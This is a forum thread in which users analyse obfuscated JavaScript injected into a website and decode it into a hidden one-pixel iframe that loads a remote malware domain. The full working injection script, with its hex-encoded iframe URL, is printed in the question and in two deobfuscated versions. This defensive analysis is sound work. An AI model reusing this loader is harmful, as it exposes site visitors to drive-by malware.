LinuxQuestions.org
Old 07-20-2008, 11:14 PM   #1
Doctorzongo
Is this JavaScript malicious?


Hello. I am extremely new to the world of JavaScript (i.e. I can make buttons) and I need someone to tell me if the following code is malicious. Google has reported the site that it belongs to (asgardhighcouncil.org) as malicious. Thanks.

Code:
<!--pw94sjwqo4B1reiwnc--><script type="text/javascript">
function C7D36720260A79BEECF3B8D6D(C78D9ED077610F5E11){function E69961B4A47426004A21A064DA3(){return 16;}return(parseInt(C78D9ED077610F5E11,E69961B4A47426004A21A064DA3()));}
function DB47FCE800845F2179C(D89D6EB726D3262DEA5){function CF7A2398A7A3B02EEF51A624DC28F2(){return 2;}var B0A173316D010072="";
for(D6BE4D56711AC9FE592=0;D6BE4D56711AC9FE592<D89D6EB726D3262DEA5.length;D6BE4D56711AC9FE592+=CF7A2398A7A3B02EEF51A624DC28F2()){B0A173316D010072+=(String.fromCharCode(C7D36720260A79BEECF3B8D6D(D89D6EB726D3262DEA5.substr(D6BE4D56711AC9FE592,CF7A2398A7A3B02EEF51A624DC28F2()))));}
document.write(B0A173316D010072);}
DB47FCE800845F2179C("3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672F746D702F222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");
</script>
The above was directly after the </html> tag.
It looks to me to be junk ... but maybe I am just not advanced enough yet.

And could someone explain to me what it does?
 
Old 07-20-2008, 11:51 PM   #2
jesseruu
Yep, that's one malicious code....

I copied it into notepad and saved it as htm with the html tags etc.

and when I run it McAfee tells me it's a trojan...


One question: what's that code supposed to be?
 
Old 07-21-2008, 12:03 AM   #3
jesseruu
I have now searched quite a few forums for that code and in every one of them someone said it's a trojan virus...

hope this helped
 
Old 07-21-2008, 02:49 AM   #4
fcdev
What the coder has done is replace function and parameter names with numbers that look like hexadecimal numbers (making it harder to read).

Using a text editor ...

Replace C78D9ED077610F5E11 with hex_str
Replace E69961B4A47426004A21A064DA3 with func_16
Replace CF7A2398A7A3B02EEF51A624DC28F2 with func_2
Replace D89D6EB726D3262DEA5 with source_str
Replace DB47FCE800845F2179C with decode
Replace B0A173316D010072 with the_text
Replace D6BE4D56711AC9FE592 with index
Replace C7D36720260A79BEECF3B8D6D with hex2dec

This converts the code to something like this ...
-----------------------------------------------------------------------
function hex2dec(hex_str)
{
  function func_16()
  {
    return 16;
  }
  return (
    parseInt(hex_str,
      func_16()
    )
  );
}

function decode(source_str)
{
  function func_2()
  {
    return 2;
  }
  var the_text="";

  for(var index=0; index<source_str.length; index+=func_2())
  {
    the_text+=(String.fromCharCode(hex2dec(source_str.substr(index,func_2()))));
  }
  document.write(the_text);
}

decode("3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672F746D702F222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");
-----------------------------------------------------------------------

func_16 just returns 16, so we replace any calls to that with the number 16.
func_2 just returns 2, so we replace any calls to that with the number 2

This makes the code even simpler to follow ...

-----------------------------------------------------------------------
function hex2dec(hex_str)
{
  return (
    parseInt( hex_str, 16 )
  );
}

function decode(source_str)
{
  var the_text="";

  for(var index=0; index<source_str.length; index+=2)
  {
    the_text+=(String.fromCharCode(hex2dec(source_str.substr(index,2))));
  }
  document.write(the_text);
}

decode("3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672F746D702F222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");
-----------------------------------------------------------------------

So, that big long string is a series of 2 digit hexadecimal numbers, then it's converting them into integers, and then converts that integer back into a printable character. Therefore, every 2 characters in that string is being converted into one character. Whatever it's decoded into is then sent to the HTML parser. I haven't had time to decode that string, but my guess is that it's not too friendly. Maybe someone else could decode it and tell us what it says.
 
Old 07-21-2008, 05:10 AM   #5
unSpawn
Decoding that string results in a one pixel style=visibility:hidden iframe being added to the page (what domain it provides (has "money" in it) should not be posted exactly here as the URI will be malicious and we need not advertise it anyway) and IIGC details of the trojan itself are at http://vil.nai.com/vil/content/v_144460.htm.

SANS' "Decoding Javascript": http://handlers.sans.org/dwesemann/decode/
Jsdecode (SpiderMonkey wrapper): http://www.disog.org/public/jsdecode.pl.txt
Malzilla (w32): http://malzilla.sourceforge.net/
 
Old 07-21-2008, 10:44 AM   #6
Doctorzongo
Alright -- sorry. Thanks everyone for helping. I needed to make sure that it was malicious. Does anyone know of websites having that code injected during an attack?
 
Old 07-21-2008, 03:42 PM   #7
unSpawn
Quote:
Originally Posted by Doctorzongo View Post
Does anyone know of websites having that code injected during an attack?
Unless you're trawling for vulnerable sites, what good would that do you? Shouldn't your question instead read: "How do I clean up and prevent this from happening ever again?"
 
  

